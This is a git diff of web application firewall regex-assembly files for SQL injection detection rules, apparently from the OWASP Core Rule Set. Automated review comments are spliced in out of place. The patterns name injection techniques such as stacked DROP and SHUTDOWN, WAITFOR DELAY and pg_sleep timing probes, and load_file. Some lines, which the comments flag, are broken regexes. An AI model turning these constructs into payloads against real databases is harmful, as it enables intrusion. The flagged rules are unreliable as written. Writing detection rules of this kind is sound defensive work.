+ &&
+ \|\|
+ and
+ between
+ div
+ like
+ nand
+ not
+ or
+ xor
+ xxor
+ ##!=>
+
+ [\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()]
+##!<
+
+
+##! Looking for patterns like:
+##! \d\s*?between\s*?\d+\s*?[\-+]
+
+##!> assemble
+ \d\s*?
+ ##!=>
+
+ and
+ between
+ div
+ like
+ or
+ xor
+ ##!=>
+
+ \s*?\d+\s*?[\-+]
+##!<
+
+##! Looking for a variation of the pattern above:
+\d\s+group\s+by.+\(
+
+
+##! Looking for patterns like:
+##! \/\w+;?\s+between\W
+
+##!> assemble
+ \/\w+;?\s+
+ ##!=>
+
+ and
+ between
+ div
+ having
+ like
+ or
+ select
+ xor
+ ##!=>
+
+ \W
+##!<
+
+
+##! Looking for patterns like:
+##! ;\s*?drop
+##! #\s*?alter
+##! --\s*?drop
+
+##!> assemble
+ ;\s*?
+ #\s*?
+ --\s*?
+ ##!=>
+
+ alter
+ drop
+ ##!=>
+##!<
+
+
+##! Looking for patterns like:
+##! ;\s*?update\s*?\w{2,}
+##! #\s*?insert\s*?\w{2,}
+##! --\s*?update\s*?\w{2,}
+
+##!> assemble
+ ;\s*?
+ #\s*?
+ --\s*?
+ ##!=>
+
+ insert
+ update
+ ##!=>
+
+ \s*?\w{2,}
+ ##!=>
+##!<
+
+
+##! Looking for these unique patterns:
+@.+=\s*?\(\s*?select
+[^\w]SET\s*?@\w+
diff --git a/regex-assembly/942230.ra b/regex-assembly/942230.ra
new file mode 100644
index 0000000000..7c0dafd046
--- /dev/null
+++ b/regex-assembly/942230.ra
@@ -0,0 +1,9 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
+[\s()]case\s+when.*?then
+\)\s*?like\s*?\(
+select.*?having\s*?[^\s]+\s*?[^\w\s]
+if\s?\(\w+\s*?[=<>~]
diff --git a/regex-assembly/942240.ra b/regex-assembly/942240.ra
new file mode 100644
index 0000000000..fd42ddd103
--- /dev/null
+++ b/regex-assembly/942240.ra
@@ -0,0 +1,32 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
+##! Helpers
+##!> define alter alter\s*?\w+.*?
+
+##!> define set \s+set\s+\w+
+
+##!> define ticks [\"'`]
+
+##!> define waitfor \s*?waitfor\s+
+
+##! Main assembly
+##!> assemble
+ {{alter}}
+ ##!=>
+ char
+ character
+ ##!=>
+ {{set}}
+##!<
+
+##!> assemble
+ {{ticks}}
+ ##!=>
+ ;*?{{waitfor}}time\s+[\"'`]
+ ;*?{{waitfor}}delay\s+[\"'`]
+ ;.*?:\s*?goto
+ ##!=>
+##!<
diff --git a/regex-assembly/942260.ra b/regex-assembly/942260.ra
new file mode 100644
index 0000000000..10fa4766d4
--- /dev/null
+++ b/regex-assembly/942260.ra
@@ -0,0 +1,31 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
+##!> define quotes [\"'`]
+
+
+##!> assemble
+ {{quotes}}\s*?
+ ##!=>
+ and
+ nand
+ or
+ xor
+ xxor
+ div
+ like
+ between
+ not
+ \|\|
+ &&
+ ##!=>
+ \s+[\s\w]+=\s*?\w+\s*?having\s+
+ ##!=>
+##!<
+
+\w\s+like\s+{{quotes}}
+like\s*?{{quotes}}\%
+{{quotes}}\s*?like\W*?[\"'`\d]
+select\s+?[\[\]()\s\w\.,\"'`-]+from\s+
diff --git a/regex-assembly/942280.ra b/regex-assembly/942280.ra
new file mode 100644
index 0000000000..0d07e85b7b
--- /dev/null
+++ b/regex-assembly/942280.ra
@@ -0,0 +1,20 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
+##!> define optional_whitespace \s*?
+
+##! The following part is going to be appended
+##! to match the end of a query or a comment syntax
+##!> define terminators (?:[#;{]|\/\*|--)
+
+##! In PostgreSQL, you can use the pg_sleep() function
+##! to delay execution for a given number of seconds
+select{{optional_whitespace}}pg_sleep
+
+##! WAITFOR DELAY blocks the execution until a time interval elapses
+waitfor{{optional_whitespace}}delay\s?[\"'`]+\s?\d
+
+##! SHUTDOWN immediately stops SQL Server
+;{{optional_whitespace}}shutdown{{optional_whitespace}}{{terminators}}
diff --git a/regex-assembly/942290.ra b/regex-assembly/942290.ra
new file mode 100644
index 0000000000..2966c2ee75
--- /dev/null
+++ b/regex-assembly/942290.ra
@@ -0,0 +1,41 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
+##!> define operator_syntax_start \[?\$
+##!> define operator_syntax_end \]?
+
+##!> assemble
+ {{operator_syntax_start}}
+ ##!=>
+ ne
+ eq
+ lt
+ lte
+ ni
+ nin
+ mod
+ all
+ size
+ exists
+ type
+ slice
+ or
+ xor
+ nor
+ div
+ like
+ between
+ and
+ nor
+ not
+ regex
+ text
+ where
+ jsonSchema
+ elemMatch
+ ##!=>
+ {{operator_syntax_end}}
+ ##!=>
+##!<
diff --git a/regex-assembly/942300.ra b/regex-assembly/942300.ra
new file mode 100644
index 0000000000..bf4275210b
--- /dev/null
+++ b/regex-assembly/942300.ra
@@ -0,0 +1,60 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
+##!> define required-spaces-plus-sql-function-call \s+\w+\(
+##!> define quotes [\"'`]
+##!> define start-comment \/\*!
+##!> define lazy-optional-spaces \s*?
+##!> define lazy-optional-spaces-with-numbers {{lazy-optional-spaces}}\d+{{lazy-optional-spaces}}
+##!> define lazy-optional-spaces-numeric-function-call {{lazy-optional-spaces}}\({{lazy-optional-spaces}}\d
+##!> define lazy-optional-spaces-plus-sql-function-call {{lazy-optional-spaces}}\w+\(
+
+\){{lazy-optional-spaces}}when{{lazy-optional-spaces-with-numbers}}then
+
+##!> assemble
+ {{quotes}}{{lazy-optional-spaces}}
+ ##!=>
+ #
+ --
+ {
+##!<
+
+{{start-comment}}\s?\d+
+
+##!> assemble
+ \b
+ ##!=>
+
+ ##!> assemble
+ binary
+ char
+ chr
+ ##!=>
+ {{lazy-optional-spaces-numeric-function-call}}
+ ##!<
+
+ ##!> assemble
+ and
+ nand
+ or
+ xor
+ xxor
+ div
+ like
+ between
+ not
+ regexp
+ rlike
+ ##!=>
+ {{required-spaces-plus-sql-function-call}}
+ ##!<
+##!<
+
+##!> assemble
+ \|\|
+ &&
+ ##!=>
+ {{lazy-optional-spaces-plus-sql-function-call}}
+##!<
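Review bot: `nor` is listed twice in the operator alternation of the assemble block (once after `xor`, once after `and`); the assembler will fold the duplicate away, so this is harmless, but a duplicate in a hand-curated list usually means a different operator was meant, so either delete the second `nor` or replace it with the operator that was intended. A one-line `##!` comment naming the source of this MongoDB operator list would also make future additions easier to check.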
diff --git a/util/regexp-assemble/regexp-942310.data b/regex-assembly/942310.ra
similarity index 72%
rename from util/regexp-assemble/regexp-942310.data
rename to regex-assembly/942310.ra
index be535c05ee..2040b9e3fa 100644
--- a/util/regexp-assemble/regexp-942310.data
+++ b/regex-assembly/942310.ra
@@ -1,4 +1,8 @@
-[\"'`]\s+and\s*?=\W
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
 \(\s*?select\s*?\w+\s*?\(
 \*\/from
 \+\s*?\d+\s*?\+\s*?@
diff --git a/regex-assembly/942320.ra b/regex-assembly/942320.ra
new file mode 100644
index 0000000000..c19b5fa7d7
--- /dev/null
+++ b/regex-assembly/942320.ra
@@ -0,0 +1,6 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
+##!> include sql-injection-mysql-postgresql-procedures-functions.ra
diff --git a/regex-assembly/942321.ra b/regex-assembly/942321.ra
new file mode 100644
index 0000000000..c19b5fa7d7
--- /dev/null
+++ b/regex-assembly/942321.ra
@@ -0,0 +1,6 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
+##!> include sql-injection-mysql-postgresql-procedures-functions.ra
diff --git a/regex-assembly/942330.ra b/regex-assembly/942330.ra
new file mode 100644
index 0000000000..f1e2ec9dfe
--- /dev/null
+++ b/regex-assembly/942330.ra
@@ -0,0 +1,51 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
+[\"'`]\s*?\bor\b\s*?[\"'`]?\d
+[\"'`]\s*?\bxor\b\s*?[\"'`]?\d
+[\"'`]\s*?\bdiv\b\s*?[\"'`]?\d
+[\"'`]\s*?\blike\b\s*?[\"'`]?\d
+[\"'`]\s*?\bbetween\b\s*?[\"'`]?\d
+[\"'`]\s*?\band\b\s*?[\"'`]?\d
+\x5cx(?:23|27|3d)
+^.?[\"'`]$
+^[\"'`\x5c]*?[\d\"'`]+\s*?\band\b\s*?[\w\"'`][+&!@(),.-]
+^[\"'`\x5c]*?[\d\"'`]+\s*?\bnand\b\s*?[\w\"'`][+&!@(),.-]
+^[\"'`\x5c]*?[\d\"'`]+\s*?\bor\b\s*?[\w\"'`][+&!@(),.-]
+^[\"'`\x5c]*?[\d\"'`]+\s*?\bxor\b\s*?[\w\"'`][+&!@(),.-]
+^[\"'`\x5c]*?[\d\"'`]+\s*?\bxxor\b\s*?[\w\"'`][+&!@(),.-]
+^[\"'`\x5c]*?[\d\"'`]+\s*?\bdiv\b\s*?[\w\"'`][+&!@(),.-]
+^[\"'`\x5c]*?[\d\"'`]+\s*?\blike\b\s*?[\w\"'`][+&!@(),.-]
+^[\"'`\x5c]*?[\d\"'`]+\s*?\bbetween\b\s*?[\w\"'`][+&!@(),.-]
+^[\"'`\x5c]*?[\d\"'`]+\s*?\bnot\b\s*?[\w\"'`][+&!@(),.-]
+^[\"'`\x5c]*?[\d\"'`]+\s*?\b\|\|\b\s*?[\w\"'`][+&!@(),.-]
+^[\"'`\x5c]*?[\d\"'`]+\s*?\b\&\&\b\s*?[\w\"'`][+&!@(),.-]
+^[\"'`\x5c]*?[^\"'`]+[\"'`]\s*?\band\b\s*?[\w\"'`][+&!@(),.-]
+^[\"'`\x5c]*?[^\"'`]+[\"'`]\s*?\bnand\b\s*?[\w\"'`][+&!@(),.-]
+^[\"'`\x5c]*?[^\"'`]+[\"'`]\s*?\bor\b\s*?[\w\"'`][+&!@(),.-]
+^[\"'`\x5c]*?[^\"'`]+[\"'`]\s*?\bxor\b\s*?[\w\"'`][+&!@(),.-]
+^[\"'`\x5c]*?[^\"'`]+[\"'`]\s*?\bxxor\b\s*?[\w\"'`][+&!@(),.-]
+^[\"'`\x5c]*?[^\"'`]+[\"'`]\s*?\bdiv\b\s*?[\w\"'`][+&!@(),.-]
+^[\"'`\x5c]*?[^\"'`]+[\"'`]\s*?\blike\b\s*?[\w\"'`][+&!@(),.-]
+^[\"'`\x5c]*?[^\"'`]+[\"'`]\s*?\bbetween\b\s*?[\w\"'`][+&!@(),.-]
+^[\"'`\x5c]*?[^\"'`]+[\"'`]\s*?\bnot\b\s*?[\w\"'`][+&!@(),.-]
+^[\"'`\x5c]*?[^\"'`]+[\"'`]\s*?\b\|\|\b\s*?[\w\"'`][+&!@(),.-]
+^[\"'`\x5c]*?[^\"'`]+[\"'`]\s*?\b\&\&\b\s*?[\w\"'`][+&!@(),.-]
+[^\w\s]\w+\s*?[|-]\s*?[\"'`]\s*?\w
+@\w+\s+and\b\s*?[\"'`\d]+
+@\w+\s+or\b\s*?[\"'`\d]+
+@\w+\s+xor\b\s*?[\"'`\d]+
+@\w+\s+div\b\s*?[\"'`\d]+
+@\w+\s+like\b\s*?[\"'`\d]+
+@\w+\s+between\b\s*?[\"'`\d]+
+@[\w-]+\sand\b\s*?[^\w\s]
+@[\w-]+\sor\b\s*?[^\w\s]
+@[\w-]+\sxor\b\s*?[^\w\s]
+@[\w-]+\sdiv\b\s*?[^\w\s]
+@[\w-]+\slike\b\s*?[^\w\s]
+@[\w-]+\sbetween\b\s*?[^\w\s]
+[^\w\s:]\s*?\d\W+[^\w\s]\s*?[\"'`].
+\Winformation_schema
+table_name\W
diff --git a/regex-assembly/942340.ra b/regex-assembly/942340.ra
new file mode 100644
index 0000000000..385bd8443e
--- /dev/null
+++ b/regex-assembly/942340.ra
@@ -0,0 +1,28 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
+in\s*?\(+\s*?select
+(?i:(?:n?and|x?x?or|div|like|between|not)\s+|(?:\|\||\&\&)\s*)[\s\w+]+regexp\s*?\(
+(?i:(?:n?and|x?x?or|div|like|between|not)\s+|(?:\|\||\&\&)\s*)[\s\w+]+sounds\s+like\s*?[\"'`]
+(?i:(?:n?and|x?x?or|div|like|between|not)\s+|(?:\|\||\&\&)\s*)[\s\w+]+[=\d]+x
+[\"'`]\s*?\d\s*?--
+[\"'`]\s*?\d\s*?#
+[\"'`][\%&<>^=]+\d\s*?=
+[\"'`][\%&<>^=]+\d\s*?or
+[\"'`][\%&<>^=]+\d\s*?xor
+[\"'`][\%&<>^=]+\d\s*?div
+[\"'`][\%&<>^=]+\d\s*?like
+[\"'`][\%&<>^=]+\d\s*?between
+[\"'`][\%&<>^=]+\d\s*?and
+[\"'`]\W+[\w+-]+\s*?=\s*?\d\W+[\"'`]
+[\"'`]\s*?is\s*?\d.+[\"'`]?\w
+[\"'`]\|?[\w-]{3,}[^\w\s.,]+[\"'`]
+[\"'`]\s*?is\s*?[\d.]+\s*?\W.*?[\"'`]
+\bexcept\s+select\b
+\bexcept\s+values\s*?\(
+[\"'`]\s*(?i:(?:n?and|x?x?or|div|like|between|not)\s+|(?:\|\||\&\&)\s*)array\s*\[
+[\"'`]\s*(?i:(?:n?and|x?x?or|div|like|between|not)\s+|(?:\|\||\&\&)\s*)[\w]+\s*!?~
+[\"'`]\s*(?i:(?:n?and|x?x?or|div|like|between|not)\s+|(?:\|\||\&\&)\s*)[\w]+\s+(?:not\s+)?similar\s+to\s+
+[\"'`]\s*(?i:(?:n?and|x?x?or|div|like|between|not)\s+|(?:\|\||\&\&)\s*)(?:true|false)\b
diff --git a/regex-assembly/942350.ra b/regex-assembly/942350.ra
new file mode 100644
index 0000000000..170fbd397e
--- /dev/null
+++ b/regex-assembly/942350.ra
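Review bot: The `\b\|\|\b` and `\b\&\&\b` lines in the two `^[\"'`\x5c]*?...` families are broken by the word boundaries: `\b` needs a word/non-word transition, and because `|` and `&` are non-word characters it demands a word character immediately on both sides of the operator. In the `[\d\"'`]+\s*?\b\|\|\b\s*?[\w\"'`]` family that means only the `1||a` shape can match and `1 || 1` or `'||'` cannot; in the `[^\"'`]+[\"'`]\s*?\b\|\|\b` family the character before the operator is always a quote or whitespace, so those four alternatives can never match at all. Use the operators without `\b`, as 942260 and 942340 in this same change do, e.g. `^[\"'`\x5c]*?[\d\"'`]+\s*?\|\|\s*?[\w\"'`][+&!@(),.-]` and `^[\"'`\x5c]*?[^\"'`]+[\"'`]\s*?\&\&\s*?[\w\"'`][+&!@(),.-]`.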
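Review bot: The operator prefix `(?i:(?:n?and|x?x?or|div|like|between|not)\s+|(?:\|\||\&\&)\s*)` is spelled out verbatim seven times, and its `(?i:` is redundant because the file already sets `##!+ i`; the other files in this change factor such shared fragments with `##!> define`. Suggest `##!> define operator-prefix (?:(?:n?and|x?x?or|div|like|between|not)\s+|(?:\|\||\&\&)\s*)` near the top and `{{operator-prefix}}` at each of the seven uses, so the alternation is maintained in one place and a future operator addition cannot miss a line.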
@@ -0,0 +1,30 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
+create\s+function\s.+\sreturns
+
+##!> assemble
+
+ ##! matching the injection start
+ ;\s*?
+
+ ##!=>
+ alter
+ create
+ delete
+ desc
+ drop
+ insert
+ load
+ rename
+ select
+ truncate
+ update
+ ##!=>
+
+ ##! matching function/object parameters syntax
+ \b\s*?[\[(]?\w{2,}
+ ##!=>
+##!<
diff --git a/util/regexp-assemble/regexp-942360.data b/regex-assembly/942360.ra
similarity index 70%
rename from util/regexp-assemble/regexp-942360.data
rename to regex-assembly/942360.ra
index 177c18fdfe..62a4b6c801 100644
--- a/util/regexp-assemble/regexp-942360.data
+++ b/regex-assembly/942360.ra
@@ -1,46 +1,52 @@
-alter\s+char\s?[(]?
-alter\s+group_concat\s?[(]?
-alter\s+load_file\s?[(]?
-create\s+char\s?[(]?
-create\s+group_concat\s?[(]?
-create\s+load_file\s?[(]?
-delete\s+char\s?[(]?
-delete\s+group_concat\s?[(]?
-delete\s+load_file\s?[(]?
-desc\s+char\s?[(]?
-desc\s+group_concat\s?[(]?
-desc\s+load_file\s?[(]?
-insert\s+char\s?[(]?
-insert\s+group_concat\s?[(]?
-insert\s+load_file\s?[(]?
-load\s+char\s?[(]?
-load\s+group_concat\s?[(]?
-load\s+load_file\s?[(]?
-rename\s+char\s?[(]?
-rename\s+group_concat\s?[(]?
-rename\s+load_file\s?[(]?
-select\s+char\s?[(]?
-select\s+group_concat\s?[(]?
-select\s+load_file\s?[(]?
-truncate\s+char\s?[(]?
-truncate\s+group_concat\s?[(]?
-truncate\s+load_file\s?[(]?
-update\s+char\s?[(]?
-update\s+group_concat\s?[(]?
-update\s+load_file\s?[(]?
-end\s*?\);
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
+\balter\s+char\b\s*\(?
+\balter\s+group_concat\b\s*\(?
+\balter\s+load_file\b\s*\(?
+\bcreate\s+char\b\s*\(?
+\bcreate\s+group_concat\b\s*\(?
+\bcreate\s+load_file\b\s*\(?
+\bdelete\s+char\b\s*\(?
+\bdelete\s+group_concat\b\s*\(?
+\bdelete\s+load_file\b\s*\(?
+\bdesc\s+char\b\s*\(?
+\bdesc\s+group_concat\b\s*\(?
+\bdesc\s+load_file\b\s*\(?
+\binsert\s+char\b\s*\(?
+\binsert\s+group_concat\b\s*\(?
+\binsert\s+load_file\b\s*\(?
+\bload\s+char\b\s*\(?
+\bload\s+group_concat\b\s*\(?
+\bload\s+load_file\b\s*\(?
+\brename\s+char\b\s*\(?
+\brename\s+group_concat\b\s*\(?
+\brename\s+load_file\b\s*\(?
+\bselect\s+char\b\s*\(?
+\bselect\s+group_concat\b\s*\(?
+\bselect\s+load_file\b\s*\(?
+\btruncate\s+char\b\s*\(?
+\btruncate\s+group_concat\b\s*\(?
+\btruncate\s+load_file\b\s*\(?
+\bupdate\s+char\b\s*\(?
+\bupdate\s+group_concat\b\s*\(?
+\bupdate\s+load_file\b\s*\(?
+\bend\s*?\);
 [\s(]load_file\s*?\(
 [\"'`]\s+regexp\W
-[\d\W]\s+as\b\s*[\"'`\w]+\s*\bfrom
+[\"'`\w]\s+as\b\s*[\"'`\w]+\s*\bfrom
 ^[\W\d]+\s*?create\s+\w+
-^[\W\d]+\s*?delete\b
-^[\W\d]+\s*?desc\b
-^[\W\d]+\s*?insert\b
-^[\W\d]+\s*?load\b
-^[\W\d]+\s*?rename\b
-^[\W\d]+\s*?select\b
-^[\W\d]+\s*?truncate\b
-^[\W\d]+\s*?update\b
+^[\W\d]+\s*?delete\s+\w+
+^[\W\d]+\s*?desc\s+\w+
+^[\W\d]+\s*?drop\s+\w+
+^[\W\d]+\s*?insert\s+\w+
+^[\W\d]+\s*?load\s+\w+
+^[\W\d]+\s*?rename\s+\w+
+^[\W\d]+\s*?select\s+\w+
+^[\W\d]+\s*?truncate\s+\w+
+^[\W\d]+\s*?update\s+\w+
 ^[\W\d]+\s*?alter\s*aggregate\b
 ^[\W\d]+\s*?alter\s*application\s*role\b
 ^[\W\d]+\s*?alter\s*assembly\b
diff --git a/regex-assembly/942362.ra b/regex-assembly/942362.ra
new file mode 100644
index 0000000000..f0461e3331
--- /dev/null
+++ b/regex-assembly/942362.ra
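Review bot: The thirty rewritten `\b<cmd>\s+<func>\b\s*\(?` lines still end in a fully optional tail, `\s*\(?`, which cannot affect whether the regex matches — `\balter\s+char\b` alone accepts exactly the same inputs — so the rewrite from `\s?[(]?` keeps a no-op; either drop the tail or require the parenthesis (`\b\s*\(`) if the goal is to match an actual function call and cut false positives on prose such as "select char". The replacement of `[\d\W]\s+as\b...` by `[\"'`\w]\s+as\b...` narrows the character allowed before `as` to quotes and word characters and so stops matching after `)` or `,`; if that is a deliberate false-positive fix, a `##!` comment saying so would spare the next reader from reverting it. The hunk starts outside SOURCE only in its old side; the new side is complete here.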
@@ -0,0 +1,171 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
+##! Helpers
+
+##!> define nonword_number ^[\W\d]+\s*?
+
+##!> define cmd_alter alter
+##!> define cmd_create create
+##!> define cmd_delete delete
+##!> define cmd_desc desc
+##!> define cmd_insert insert
+##!> define cmd_load load
+##!> define cmd_rename rename
+##!> define cmd_select select
+##!> define cmd_truncate truncate
+##!> define cmd_update update
+##!> define cmd_drop drop
+##!> define cmd_union union
+
+##!> define seq_char \s+char\s?\(?
+##!> define seq_group_concat \s+group_concat\s?\(?
+##!> define seq_load_file \s+load_file\s?\(?
+
+##! Main assembly
+##!> assemble
+ ##!> assemble
+ {{cmd_alter}}
+ {{cmd_create}}
+ {{cmd_delete}}
+ {{cmd_desc}}
+ {{cmd_insert}}
+ {{cmd_load}}
+ {{cmd_rename}}
+ {{cmd_select}}
+ {{cmd_truncate}}
+ {{cmd_update}}
+ ##!=>
+ {{seq_char}}
+ {{seq_group_concat}}
+ {{seq_load_file}}
+ ##!<
+
+ end\s*?\);
+ [\s(]load_file\s*?\(
+ [\"'`]\s+regexp\W
+ [\d\W]\s+as\b\s*[\"'`\w]+\s*\bfrom
+
+ ##!> assemble
+ {{nonword_number}}
+ ##!=>
+ {{cmd_create}}\s+\w+
+ {{cmd_delete}}\b
+ {{cmd_desc}}\b
+ {{cmd_drop}}\b
+ {{cmd_insert}}\b
+ {{cmd_load}}\b
+ {{cmd_rename}}\b
+ {{cmd_select}}\b
+ {{cmd_truncate}}\b
+ {{cmd_update}}\b
+ ##!> assemble
+ {{cmd_alter}}\s*
+ ##!=>
+ aggregate
+ application\s*role
+ assembly
+ asymmetric\s*key
+ audit
+ authorization
+ availability\s*group
+ broker\s*priority
+ bufferpool
+ certificate
+ cluster
+ collation
+ column
+ conversion
+ credential
+ cryptographic\s*provider
+ database
+ default
+ dimension
+ diskgroup
+ domain
+ endpoint
+ extension
+ external
+ event
+ flashback
+ foreign
+ fulltext
+ function
+ hierarchy
+ group
+ histogram
+ index
+ indextype
+ inmemory
+ instance
+ java
+ language
+ large
+ library
+ lockdown
+ logfile\s*group
+ login
+ mask
+ master\s*key
+ materialized
+ message\s*type
+ method
+ module
+ nickname
+ operator
+ outline
+ package
+ partition
+ permission
+ procedure
+ profile
+ queue
+ remote
+ resource
+ role
+ rollback
+ route
+ schema
+ search
+ security
+ server
+ service
+ sequence
+ session
+ symmetric\s*key
+ synonym
+ stogroup
+ table
+ tablespace
+ text
+ threshold
+ trigger
+ trusted
+ type
+ usage
+ user
+ view
+ work
+ workload
+ wrapper
+ xml\s*schema
+ xsrobject
+ ##!=>
+ \b
+ ##!=>
+ ##!<
+
+ ##!> assemble
+ {{cmd_union}}\s*
+ ##!=>
+ all
+ select
+ distinct
+ ##!=>
+ \b
+ ##!=>
+ ##!<
+ ##!<
+##!<
diff --git a/regex-assembly/942370.ra b/regex-assembly/942370.ra
new file mode 100644
index 0000000000..e8253dc4ea
--- /dev/null
+++ b/regex-assembly/942370.ra
@@ -0,0 +1,51 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
+##! Helpers
+##!> define quotes [\"'`]
+
+##!> assemble
+ or
+ xor
+ div
+ like
+ between
+ and
+ ##!=< operators
+##!<
+
+##! Main assembly
+##!> assemble
+ {{quotes}}\s*?
+ ##!=>
+ ##!> assemble
+ \*.+
+ ##!=>
+ ##!> assemble
+ ##!> assemble
+ ##!=> operators
+ ##!<
+ id
+ ##!=>
+ ##!<
+ ##!=>
+ \W*?{{quotes}}\d
+ ##!=>
+ ##!<
+ [^\w\s?]+\s*?[^\w\s]+\s*?{{quotes}}
+ [^\w\s]+\s*?[\W\d].*?#
+ [^\w\s]+\s*?[\W\d].*?--
+ ##!> assemble
+ ##!> assemble
+ ##!=> operators
+ ##!<
+ ##!=>
+ \s[^\d]+[\w-]+.*?\d
+ ##!<
+##!<
+
+\^{{quotes}}
+{{quotes}}.*?\*\s*?\d
+[()\*<>%+-][\w-]+[^\w\s]+{{quotes}}[^,]
diff --git a/regex-assembly/942380.ra b/regex-assembly/942380.ra
new file mode 100644
index 0000000000..7c435bce61
--- /dev/null
+++ b/regex-assembly/942380.ra
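Review bot: The `seq_char`, `seq_group_concat` and `seq_load_file` defines end in `\s?\(?`, an optional tail that never changes whether the assembled expression matches, and the lists in this new file are the pre-rewrite forms of 942360 (`\s+char\s?\(?`, `{{cmd_delete}}\b`, `[\d\W]\s+as\b`, `end\s*?\);` without `\b`) while 942360 itself moves to `\b...\s*\(?`, `delete\s+\w+` and `[\"'`\w]\s+as\b` in this same change. If 942362 is intended as the looser sibling that is fine, but it deserves a `##!` note such as `##! Broader variant of 942360: keeps the bare-command and [\d\W] forms that 942360 dropped for false positives`, otherwise the two lists will drift apart without anyone noticing. The unused tail could also be tightened to `\s*\(` here if a function call is what is meant.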
@@ -0,0 +1,25 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
+\bhaving\b\s+\d{1,10}\s*?[=<>]
+\bhaving\b\s+'[^=]{1,10}'\s*?[=<>]
+\bexecute\(
+\bexecute\s{1,5}[\w\.$]{1,5}\s{0,3}
+\bhaving\b ?\d{1,10} ?[=<>]+
+\bhaving\b ?[\'\"][^=]{1,10}[\'\" ?[=<>]+
+\bcreate\s+?table.{0,20}?\(
+\blike\W*?char\W*?\(
+select.*?case
+from.*?limit
+order\sby
+exists\s\sselect
+exists\sselect\Sif\s\(
+exists\sselect\Sifnull\s\(
+exists\sselect\Stop
+exists\sselect\Sconcat
+exists\ssystem\s\(
+exists\s\bhaving\b\s+\d{1,10}
+exists\s'[^=]{1,10}'
+\bexists\s*?\(\s*?select\b
diff --git a/regex-assembly/942390.ra b/regex-assembly/942390.ra
new file mode 100644
index 0000000000..b13dab49f2
--- /dev/null
+++ b/regex-assembly/942390.ra
@@ -0,0 +1,17 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
+\bor\b\s?\d{1,10}\s?[=<>]+
+\bor\b\s?[\'\"][^=]{1,10}[\'\"]\s?[=<>]+
+'\s+or\s+.{1,20}[+\-!<>=]
+'\s+xor\s+.{1,20}[+\-!<>=]
+\bor\b\s+\d{1,10}
+\bor\b\s+'[^=]{1,10}'
+\bxor\b\s+\d{1,10}
+\bxor\b\s+'[^=]{1,10}'
+\bor\b\s+\d{1,10}\s*?[=<>]
+\bxor\b\s+\d{1,10}\s*?[=<>]
+\bor\b\s+'[^=]{1,10}'\s*?[=<>]
+\bxor\b\s+'[^=]{1,10}'\s*?[=<>]
diff --git a/util/regexp-assemble/regexp-942400.data b/regex-assembly/942400.ra
similarity index 51%
rename from util/regexp-assemble/regexp-942400.data
rename to regex-assembly/942400.ra
index 45b39f171e..6852bcf842 100644
--- a/util/regexp-assemble/regexp-942400.data
+++ b/regex-assembly/942400.ra
@@ -1,6 +1,9 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
 \band\b\s+\d{1,10}\s*?[=<>]
-\band\b\s+'[^=]{1,10}'\s*?[=<>]
-\band\b\s+\d{1,10}
 \band\b\s+'[^=]{1,10}'
 \band\b ?\d{1,10} ?[=<>]+
 \band\b ?[\'\"][^=]{1,10}[\'\"] ?[=<>]+
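Review bot: `\bhaving\b ?[\'\"][^=]{1,10}[\'\" ?[=<>]+` is missing the `]` that closes the second quote class: as written, `[\'\" ?[=<>]` is a single character class (quote, double quote, space, `?`, `[`, `=`, `<`, `>`) quantified by `+`, so the pattern no longer requires a closing quote before the comparison operator and accepts e.g. `having 'abcdefghij[`. The sibling lines in 942390 and 942400 show the intended shape; change it to `\bhaving\b ?[\'\"][^=]{1,10}[\'\"] ?[=<>]+`. While here, `exists\s\bhaving\b\s+\d{1,10}` combines `\s` with an immediately following `\b`, which is redundant before a word character and reads as if something was dropped — worth a second look.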
diff --git a/util/regexp-assemble/regexp-942410.data b/regex-assembly/942410.ra
similarity index 93%
rename from util/regexp-assemble/regexp-942410.data
rename to regex-assembly/942410.ra
index 62a5bb5934..751d6252f6 100644
--- a/util/regexp-assemble/regexp-942410.data
+++ b/regex-assembly/942410.ra
@@ -1,3 +1,10 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+##!^ \b
+##!$ \W*?\(
+
 abs
 acos
 adddate
diff --git a/regex-assembly/942440-chain1.ra b/regex-assembly/942440-chain1.ra
new file mode 100644
index 0000000000..1592b5b1bd
--- /dev/null
+++ b/regex-assembly/942440-chain1.ra
@@ -0,0 +1,25 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! This chained rule is used to match on JWT base64-urlencoded tokens.
+##! See https://www.rfc-editor.org/rfc/rfc4648#section-5 for details.
+
+##! JWTs consist of base64-urlencoded encoded JSON, and a JSON structure
+##! just starts with '{"', which becomes 'ey' when encoded with a base64-urlencoded encoder.
+
+##!> define base64-urlencoded-charset [a-zA-Z0-9_-]+
+##!> define dot [.]
+
+##!^ ^ey
+
